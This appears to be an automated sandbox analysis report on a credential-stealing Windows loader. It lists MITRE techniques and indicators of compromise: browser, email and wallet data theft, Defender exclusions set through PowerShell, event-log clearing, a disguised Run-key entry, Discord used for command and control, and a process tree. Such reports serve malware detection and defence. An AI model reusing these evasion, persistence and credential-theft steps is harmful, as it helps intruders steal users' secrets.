0ca594179661c1ec0c7ec592be1995a14e2b0d13d0bd7a3420cb49e6254d2903

Resubmissions

07/09/2024, 14:40

240907-r14p9ayenr 10

07/09/2024, 14:33

240907-rwwh3s1alc 10

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
07/09/2024, 14:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

loader.exe
Size

14.4MB
MD5

0b36da64b85e5abae7a93017d46dcce1
SHA1

40506f88be2a8f9fc03083f8d934b58fe22c3ae5
SHA256

0ca594179661c1ec0c7ec592be1995a14e2b0d13d0bd7a3420cb49e6254d2903
SHA512

a0a8fbb2127451ae7c776fff5e2d26d1d8e035527010f7f91a2904a76edfcaa054bf5becddc29fbe98e49bd211f8ae1f94c884e8e92c9b62984313cf843d9572
SSDEEP

196608:tzElGkSaXkbEzeMeHJJ4u/RVyjwnx4YpXNzP0nreN:5ElGbFbEzVO4u/Rg9YTzF

Score

10^/10

credential_access defense_evasion discovery evasion execution persistence privilege_escalation spyware stealer

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs

description	pid	Process	procid_target
PID 216 created 3348	216	.exe	56
PID 216 created 3348	216	.exe	56
PID 216 created 3348	216	.exe	56
PID 216 created 3348	216	.exe	56
PID 216 created 3348	216	.exe	56
PID 4900 created 3348	4900	updater.exe	56
PID 4900 created 3348	4900	updater.exe	56
PID 4900 created 3348	4900	updater.exe	56
PID 4900 created 3348	4900	updater.exe	56
PID 4900 created 3348	4900	updater.exe	56
PID 4900 created 3348	4900	updater.exe	56

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1204	powershell.exe
5096	powershell.exe
4852	powershell.exe
1644	powershell.exe
1384	powershell.exe
64	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	loader.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 2 IoCs

pid	Process
216	.exe
4900	updater.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\WindowsSecurity.exe"	loader.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
4	discord.com
8	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
13	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 216 set thread context of 1976	216	.exe	121
PID 4900 set thread context of 4508	4900	updater.exe	136
PID 4900 set thread context of 2976	4900	updater.exe	139
PID 4900 set thread context of 1508	4900	updater.exe	140

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\updater.exe	.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
524	sc.exe
4808	sc.exe
1096	sc.exe
2296	sc.exe
2496	sc.exe
2364	sc.exe
4224	sc.exe
3448	sc.exe
2932	sc.exe
632	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
524	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4760	wmic.exe

GoLang User-Agent 2 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	14	Go-http-client/1.1
HTTP User-Agent header	1	Go-http-client/1.1

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1725720131"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={96B456B2-D436-46A0-AEDE-4409A38DCA51}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2860	loader.exe
2860	loader.exe
2860	loader.exe
2860	loader.exe
2860	loader.exe
2860	loader.exe
2860	loader.exe
2860	loader.exe
5096	powershell.exe
2860	loader.exe
2860	loader.exe
5096	powershell.exe
2860	loader.exe
2860	loader.exe
2860	loader.exe
2860	loader.exe
2860	loader.exe
2860	loader.exe
2860	loader.exe
2860	loader.exe
2860	loader.exe
2860	loader.exe
2860	loader.exe
2860	loader.exe
1384	powershell.exe
1384	powershell.exe
2860	loader.exe
2860	loader.exe
2860	loader.exe
2860	loader.exe
2860	loader.exe
2860	loader.exe
2860	loader.exe
2860	loader.exe
2860	loader.exe
2860	loader.exe
2860	loader.exe
2860	loader.exe
2860	loader.exe
2860	loader.exe
2860	loader.exe
2860	loader.exe
2860	loader.exe
2860	loader.exe
2860	loader.exe
2860	loader.exe
2860	loader.exe
2860	loader.exe
2860	loader.exe
2860	loader.exe
2860	loader.exe
2860	loader.exe
2860	loader.exe
2860	loader.exe
2860	loader.exe
2860	loader.exe
2860	loader.exe
2860	loader.exe
2860	loader.exe
2860	loader.exe
2860	loader.exe
2860	loader.exe
2860	loader.exe
2860	loader.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2860	loader.exe
Token: SeIncreaseQuotaPrivilege	3140	wmic.exe
Token: SeSecurityPrivilege	3140	wmic.exe
Token: SeTakeOwnershipPrivilege	3140	wmic.exe
Token: SeLoadDriverPrivilege	3140	wmic.exe
Token: SeSystemProfilePrivilege	3140	wmic.exe
Token: SeSystemtimePrivilege	3140	wmic.exe
Token: SeProfSingleProcessPrivilege	3140	wmic.exe
Token: SeIncBasePriorityPrivilege	3140	wmic.exe
Token: SeCreatePagefilePrivilege	3140	wmic.exe
Token: SeBackupPrivilege	3140	wmic.exe
Token: SeRestorePrivilege	3140	wmic.exe
Token: SeShutdownPrivilege	3140	wmic.exe
Token: SeDebugPrivilege	3140	wmic.exe
Token: SeSystemEnvironmentPrivilege	3140	wmic.exe
Token: SeRemoteShutdownPrivilege	3140	wmic.exe
Token: SeUndockPrivilege	3140	wmic.exe
Token: SeManageVolumePrivilege	3140	wmic.exe
Token: 33	3140	wmic.exe
Token: 34	3140	wmic.exe
Token: 35	3140	wmic.exe
Token: 36	3140	wmic.exe
Token: SeIncreaseQuotaPrivilege	3140	wmic.exe
Token: SeSecurityPrivilege	3140	wmic.exe
Token: SeTakeOwnershipPrivilege	3140	wmic.exe
Token: SeLoadDriverPrivilege	3140	wmic.exe
Token: SeSystemProfilePrivilege	3140	wmic.exe
Token: SeSystemtimePrivilege	3140	wmic.exe
Token: SeProfSingleProcessPrivilege	3140	wmic.exe
Token: SeIncBasePriorityPrivilege	3140	wmic.exe
Token: SeCreatePagefilePrivilege	3140	wmic.exe
Token: SeBackupPrivilege	3140	wmic.exe
Token: SeRestorePrivilege	3140	wmic.exe
Token: SeShutdownPrivilege	3140	wmic.exe
Token: SeDebugPrivilege	3140	wmic.exe
Token: SeSystemEnvironmentPrivilege	3140	wmic.exe
Token: SeRemoteShutdownPrivilege	3140	wmic.exe
Token: SeUndockPrivilege	3140	wmic.exe
Token: SeManageVolumePrivilege	3140	wmic.exe
Token: 33	3140	wmic.exe
Token: 34	3140	wmic.exe
Token: 35	3140	wmic.exe
Token: 36	3140	wmic.exe
Token: SeDebugPrivilege	5096	powershell.exe
Token: SeDebugPrivilege	1384	powershell.exe
Token: SeIncreaseQuotaPrivilege	4080	wmic.exe
Token: SeSecurityPrivilege	4080	wmic.exe
Token: SeTakeOwnershipPrivilege	4080	wmic.exe
Token: SeLoadDriverPrivilege	4080	wmic.exe
Token: SeSystemProfilePrivilege	4080	wmic.exe
Token: SeSystemtimePrivilege	4080	wmic.exe
Token: SeProfSingleProcessPrivilege	4080	wmic.exe
Token: SeIncBasePriorityPrivilege	4080	wmic.exe
Token: SeCreatePagefilePrivilege	4080	wmic.exe
Token: SeBackupPrivilege	4080	wmic.exe
Token: SeRestorePrivilege	4080	wmic.exe
Token: SeShutdownPrivilege	4080	wmic.exe
Token: SeDebugPrivilege	4080	wmic.exe
Token: SeSystemEnvironmentPrivilege	4080	wmic.exe
Token: SeRemoteShutdownPrivilege	4080	wmic.exe
Token: SeUndockPrivilege	4080	wmic.exe
Token: SeManageVolumePrivilege	4080	wmic.exe
Token: 33	4080	wmic.exe
Token: 34	4080	wmic.exe

Suspicious use of UnmapMainImage 2 IoCs

pid	Process
2660	svchost.exe
3348	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2860 wrote to memory of 1524	2860	loader.exe	84
PID 2860 wrote to memory of 1524	2860	loader.exe	84
PID 2860 wrote to memory of 3140	2860	loader.exe	85
PID 2860 wrote to memory of 3140	2860	loader.exe	85
PID 2860 wrote to memory of 5096	2860	loader.exe	86
PID 2860 wrote to memory of 5096	2860	loader.exe	86
PID 2860 wrote to memory of 2748	2860	loader.exe	88
PID 2860 wrote to memory of 2748	2860	loader.exe	88
PID 2860 wrote to memory of 1384	2860	loader.exe	89
PID 2860 wrote to memory of 1384	2860	loader.exe	89
PID 2860 wrote to memory of 4080	2860	loader.exe	90
PID 2860 wrote to memory of 4080	2860	loader.exe	90
PID 2860 wrote to memory of 4760	2860	loader.exe	91
PID 2860 wrote to memory of 4760	2860	loader.exe	91
PID 2860 wrote to memory of 2124	2860	loader.exe	92
PID 2860 wrote to memory of 2124	2860	loader.exe	92
PID 2860 wrote to memory of 692	2860	loader.exe	93
PID 2860 wrote to memory of 692	2860	loader.exe	93
PID 2860 wrote to memory of 3568	2860	loader.exe	94
PID 2860 wrote to memory of 3568	2860	loader.exe	94
PID 2860 wrote to memory of 524	2860	loader.exe	97
PID 2860 wrote to memory of 524	2860	loader.exe	97
PID 2860 wrote to memory of 3632	2860	loader.exe	98
PID 2860 wrote to memory of 3632	2860	loader.exe	98
PID 3632 wrote to memory of 1628	3632	powershell.exe	99
PID 3632 wrote to memory of 1628	3632	powershell.exe	99
PID 1628 wrote to memory of 3128	1628	csc.exe	100
PID 1628 wrote to memory of 3128	1628	csc.exe	100
PID 2860 wrote to memory of 216	2860	loader.exe	111
PID 2860 wrote to memory of 216	2860	loader.exe	111
PID 1448 wrote to memory of 2296	1448	cmd.exe	116
PID 1448 wrote to memory of 2296	1448	cmd.exe	116
PID 1448 wrote to memory of 2932	1448	cmd.exe	117
PID 1448 wrote to memory of 2932	1448	cmd.exe	117
PID 1448 wrote to memory of 632	1448	cmd.exe	118
PID 1448 wrote to memory of 632	1448	cmd.exe	118
PID 1448 wrote to memory of 2364	1448	cmd.exe	119
PID 1448 wrote to memory of 2364	1448	cmd.exe	119
PID 1448 wrote to memory of 2496	1448	cmd.exe	120
PID 1448 wrote to memory of 2496	1448	cmd.exe	120
PID 216 wrote to memory of 1976	216	.exe	121
PID 1976 wrote to memory of 588	1976	dialer.exe	5
PID 1976 wrote to memory of 676	1976	dialer.exe	7
PID 1976 wrote to memory of 956	1976	dialer.exe	12
PID 1976 wrote to memory of 384	1976	dialer.exe	13
PID 676 wrote to memory of 2724	676	lsass.exe	47
PID 1976 wrote to memory of 868	1976	dialer.exe	14
PID 1976 wrote to memory of 952	1976	dialer.exe	15
PID 1976 wrote to memory of 1060	1976	dialer.exe	16
PID 1976 wrote to memory of 1068	1976	dialer.exe	17
PID 1976 wrote to memory of 1084	1976	dialer.exe	18
PID 1976 wrote to memory of 1176	1976	dialer.exe	20
PID 1976 wrote to memory of 1280	1976	dialer.exe	21
PID 1976 wrote to memory of 1288	1976	dialer.exe	22
PID 1976 wrote to memory of 1404	1976	dialer.exe	23
PID 1976 wrote to memory of 1428	1976	dialer.exe	24
PID 1976 wrote to memory of 1436	1976	dialer.exe	25
PID 1976 wrote to memory of 1464	1976	dialer.exe	26
PID 1976 wrote to memory of 1488	1976	dialer.exe	27
PID 1976 wrote to memory of 1636	1976	dialer.exe	28
PID 1976 wrote to memory of 1676	1976	dialer.exe	29
PID 1976 wrote to memory of 1752	1976	dialer.exe	30
PID 1976 wrote to memory of 1780	1976	dialer.exe	31
PID 1976 wrote to memory of 1824	1976	dialer.exe	32

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1524	attrib.exe
2748	attrib.exe
2124	attrib.exe
692	attrib.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:588
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:384

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:956

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:868

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:952

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1060

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1068

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1084

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1176
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2216
- C:\Program Files\Google\Chrome\updater.exe
  "C:\Program Files\Google\Chrome\updater.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Drops file in Program Files directory
  PID:4900

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1280

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1288

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1404

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1428

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1436

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1464

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1488
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2844

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1636

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1676

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1752

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1780

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1824

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1884

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1892

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1960

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2016

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2068

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2092

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2172

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2308

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2500

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2508

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Suspicious use of UnmapMainImage
PID:2660

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2716

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2724

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2740

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2752

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2948

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3052

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2688

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3312

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of UnmapMainImage
PID:3348
- C:\Users\Admin\AppData\Local\Temp\loader.exe
  "C:\Users\Admin\AppData\Local\Temp\loader.exe"
  2⤵
  - Drops file in Drivers directory
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2860
- - C:\Windows\system32\attrib.exe
    attrib +h +s C:\Users\Admin\AppData\Local\Temp\loader.exe
    3⤵
    - Views/modifies file attributes
